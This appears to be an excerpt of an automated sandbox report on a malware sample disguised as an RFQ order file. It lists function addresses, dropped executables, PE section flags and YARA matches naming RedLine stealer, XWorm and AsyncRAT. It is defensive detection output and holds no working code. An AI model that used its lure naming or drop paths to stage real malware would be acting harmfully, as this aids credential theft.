Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012851EE		4_2_012851EE
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012BD580		4_2_012BD580
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_01287F80		4_2_01287F80
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012B3780		4_2_012B3780
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012BC7F0		4_2_012BC7F0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_00D4DC74		6_2_00D4DC74
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_056848B0		6_2_056848B0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B886C8		6_2_06B886C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B8C0F8		6_2_06B8C0F8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B8E188		6_2_06B8E188
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B8EEE8		6_2_06B8EEE8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B8A959		6_2_06B8A959
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B893C8		6_2_06B893C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B87D60		6_2_06B87D60
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B886B9		6_2_06B886B9
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B86230		6_2_06B86230
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B86240		6_2_06B86240
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_06B88DB8		6_2_06B88DB8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07235E18		6_2_07235E18
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07231678		6_2_07231678
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07230688		6_2_07230688
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07231DC0		6_2_07231DC0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07230B08		6_2_07230B08
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_072323C8		6_2_072323C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07230040		6_2_07230040
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07231210		6_2_07231210
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07230006		6_2_07230006
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_07230014		6_2_07230014
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 6_2_056848A0		6_2_056848A0
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 7_2_00007FF88B4D038D		7_2_00007FF88B4D038D
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 7_2_00007FF88B4D75E6		7_2_00007FF88B4D75E6
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 7_2_00007FF88B4D2F90		7_2_00007FF88B4D2F90
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 7_2_00007FF88B4D5DBD		7_2_00007FF88B4D5DBD
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 7_2_00007FF88B4D3DE1		7_2_00007FF88B4D3DE1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_0099CA20		10_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_00998789		10_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009BA810		10_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009979F0		10_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009B92A0		10_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009B93B0		10_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_00997C00		10_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009C2D40		10_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Code function: 10_2_009BEEB0		10_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_022792A0		15_2_022792A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_0227EEB0		15_2_0227EEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_022793B0		15_2_022793B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_02257C00		15_2_02257C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_0227A810		15_2_0227A810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_02282D40		15_2_02282D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 15_2_022579F0		15_2_022579F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF88B4B150B		16_2_00007FF88B4B150B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF88B5830E9		16_2_00007FF88B5830E9
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B539A3		20_2_00B539A3
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B16EAF		20_2_00B16EAF
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B45980		20_2_00B45980
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B151EE		20_2_00B151EE
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B4D580		20_2_00B4D580
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B17F80		20_2_00B17F80
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B43780		20_2_00B43780
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00B4C7F0		20_2_00B4C7F0
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 20_2_00C09680		20_2_00C09680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 27_2_00007FF88B5A30B2		27_2_00007FF88B5A30B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_00007FF88B5B30E9		29_2_00007FF88B5B30E9
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D4A810		39_2_00D4A810
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D27C00		39_2_00D27C00
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D279F0		39_2_00D279F0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D52D40		39_2_00D52D40
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D4EEB0		39_2_00D4EEB0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D492A0		39_2_00D492A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 39_2_00D493B0		39_2_00D493B0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: String function: 00420AE3 appears 70 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 992

Source: chrmstp.exe.3.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.3.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe0.3.dr	Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
Source: Acrobat.exe.3.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4

Source: identity_helper.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: Number of sections : 11 > 10
Source: setup.exe.3.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: elevated_tracing_service.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: chrmstp.exe.3.dr	Static PE information: Number of sections : 14 > 10

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226844308.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1221941596.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: exhilaratingly.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
